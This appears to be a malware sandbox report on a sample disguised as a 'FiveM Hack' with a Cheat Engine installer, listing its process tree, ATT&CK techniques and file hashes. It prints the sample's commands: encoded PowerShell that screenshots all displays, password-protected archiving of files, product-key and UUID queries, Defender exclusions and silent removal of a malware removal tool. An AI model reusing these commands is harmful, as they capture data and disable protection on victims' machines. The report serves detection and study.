      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:5096
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4428
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kfzwfkpj\kfzwfkpj.cmdline"
        6⤵
        
        PID:4728
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B43.tmp" "c:\Users\Admin\AppData\Local\Temp\kfzwfkpj\CSCF3DBE2B8C194589BC7BCF6CAC12522E.TMP"
        7⤵
        
        PID:4848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3604
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3064
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1856
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:840
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2120
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:4100
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\16Y7B.zip" *"
      4⤵
      PID:2280
    - - C:\Users\Admin\AppData\Local\Temp\_MEI48082\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI48082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\16Y7B.zip" *
        5⤵
        Executes dropped EXE
        
        PID:4864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:1392
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:4308
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:3304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:2792
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:3932
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:2624
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:1724
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:964
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatEngine75.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatEngine75.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3732
- - C:\Users\Admin\AppData\Local\Temp\is-02CHQ.tmp\CheatEngine75.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-02CHQ.tmp\CheatEngine75.tmp" /SL5="$D017E,2335682,780800,C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatEngine75.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks for any installed AV software in registry
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious use of FindShellTrayWindow
    PID:4768

C:\ProgramData\kmmnqxgtotnx\dlpwxhhxvcgc.exe
C:\ProgramData\kmmnqxgtotnx\dlpwxhhxvcgc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:396
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3732
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:528
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1712
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
67e8893616f805af2411e2f4a1411b2a

SHA1
39bf1e1a0ddf46ce7c136972120f512d92827dcd

SHA256
ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31

SHA512
164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3f9bd716e1f377ea2bc560d1b84ac28a

SHA1
1b97b2d9d9134668c3f06f415da0eb73274765a0

SHA256
47a1a9da982d60ae5abb6caa7b8bd39159d06bf956d8984dd0072847da3d327a

SHA512
279d4a8e30ae1bdb338c991477ca12d9287b49bd6767a973b821519a0a9c0058055f41b7d989c7f03bf0ecc07db3455a31adf488230ebc34c843c7a554db5b78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e86a2f4d6dec82df96431112380a87e6

SHA1
2dc61fae82770528bee4fe5733a8ac3396012e79

SHA256
dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a

SHA512
5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4facdaea77b2883a8d077f63ceaf5504

SHA1
7d59598eeb3d76de0f5122aec407f5267e6147af

SHA256
93eb2e0033c22382cbb134ce97351705a7c828b8a56212decd5902c2843483f5

SHA512
a4a72a2de8760d2a8129f0ff82176255323363e73c299d787a6b9d8cb39bbd90f62de76ce1633c8f5f84927a196d408715f2e9fdd933ecc55e1a2619d5576c34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0777c7ed0aeccb058a1c306f22306f89

SHA1
17c5d6b9ff381eed9f948f7ec371e24aabc30474

SHA256
1677d8bc7f9cef4b1bec30661be183d56be431d5bca7af00959aab3b18b0f6ee

SHA512
eeb5d1cd8feb4bb1b7d41d499122718dbd66a2d13db4741a2b71f8a9c01d60ee799029676a665971707c82b565d523621eb461cace4b01924dd23eee7d16fb51

Download Submit
C:\Users\Admin\AppData\Local\Temp\89IoqGbzNZ.ps1

Filesize
380B

MD5
cbb9a56c9c8d7c3494b508934ace0b98

SHA1
e76539db673cc1751864166494d4d3d1761cb117

SHA256
027703af742d779f4dcde399ac49a3334f1b9e51b199215203e1f4b5e3251fe5

SHA512
f71e0a521c2b0aa034e0a2c9f0efd7d813d8408d118979f8e05ecd3aa6fb94c67793e2302ed9455aad9a63d43a53fa1ac2b3d45f7bdfa1cc8104c9a9ace84129

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD1B7.tmp

Filesize
1KB

MD5
6dd25bc82dc25ff8947982b5c40de584

SHA1
983a7d82d0884a020daa3a2edf5cdbd696398f64

SHA256
cad33b22f0c9a12662564a417fc08fa042fb881a483c1e6ca3761cb7438dc26a

SHA512
94bf6a6f6799d55b3dd983543b35e5b9de5b539d9d79dfd79976f3a9c5705a9def535146f904eebc47ceb0c7245be1d00f2d58c1487ee2201a2b0e16ea054f75

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatEngine75.exe

Filesize
3.1MB

MD5
609fea742d34dc1d53f0eeb4873b1a0a

SHA1
3232c52da3cb8f47a870162a35cdd75fcae60aea

SHA256
e2e15826b69778e381f25ac8f2b109a377b23f7cf79b5f482e81f4d28c30f95e

SHA512
27da89901268d153fd7158162fc8f2f3b99ec9a4aa24c281f93b500466552af776b00f0a33182386a62934c3e553561cbc23d3f5ebb0ea0366c04e046e1bcc90

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe

Filesize
7.7MB

MD5
ba7b34118537e3039ca82869140ed975

SHA1
c2d32b0570cb42fd0c23610b1514a4655783ba10

SHA256
22f6bc2477f06b718b25cb73b8446a80b27d1f8d389b7629a87c8c65fb51416c

SHA512
9c7a1b84b118c5bd95147e9822c4a8c9bbf9f1a08d9acf50e42b53a20718aaf72c4a388d93c31027b8d1552230ba2c05c3b5b7191e05833e416fed0cb34b56a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe

Filesize
29.8MB

MD5
00ce1e4793d5a4876cbb00df76e58e8c

SHA1
872387a2e9125ffe3e173fbae32280b423c5c128

SHA256
36e8a050ec80df43c8fec1cea5cde9fbb09f432ec58848399dd666a992948679

SHA512
df73de1b15f1b291af87387decc436139b52e262ef7b3500124d9e920fb1af4b99632320e0b48211b9b2151b1fcb3f4aff61ac7c2dbd6de92699dfcd11444e47

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Rename_Z60IHLDjO6.exe

Filesize
37.2MB

MD5
62b8cb69f7c3ce2c5a843a8fa66b580f

SHA1
5f0440dface4bb25bbe3ee0a7dc7223b36eca37a

SHA256
8c586ec7de39427fa8fc2480c10eb2e04728793e2033e3103ed140f1b4cfb535

SHA512
ffc19d8d3f5cd6be99065203e5fc59ad993122c9bab91c243f62390e2aff6b710a63fe0c84776822fcd5ab195eb6cfa94ed7275d0ba336d50fa32afb26141e9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Server.exe

Filesize
23KB

MD5
046a99195ebe039bdb825ebd1ce560a4

SHA1
24ccf20694cf13269313d21c5b7bc4e3dff64d7b

SHA256
cc8e70780dc86ab74f1bba933145bd931e69a9334b21c270486b24ec67cbc522

SHA512
c5d1e5d73010283eb2975a52cc49841a3c89dd93e040b20ab5e17f763135af8cf3570dcc6d43cd25d42f117f480f82d359fd56542100f9d76e4e2b8e1c1cdc17

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\build.exe

Filesize
2.5MB

MD5
ad60579bf765225e548e30a8068d03b9

SHA1
87abbf7819cd3e354a24aaeec6e1e2d77b01a72e

SHA256
9c40ef00c2bae13077c19a89a712ed3ba1786096b7360b04a6ca004bf9fc6434

SHA512
e4a26dc6d00e8117060002475861bf8224deeec6f74bedfd9070c8d5bad21cc83ae8bd8230a0a2d2d2267c1ecffa2b532f87792f9d2c3cd1ee3c55ace15d7146

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48082\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
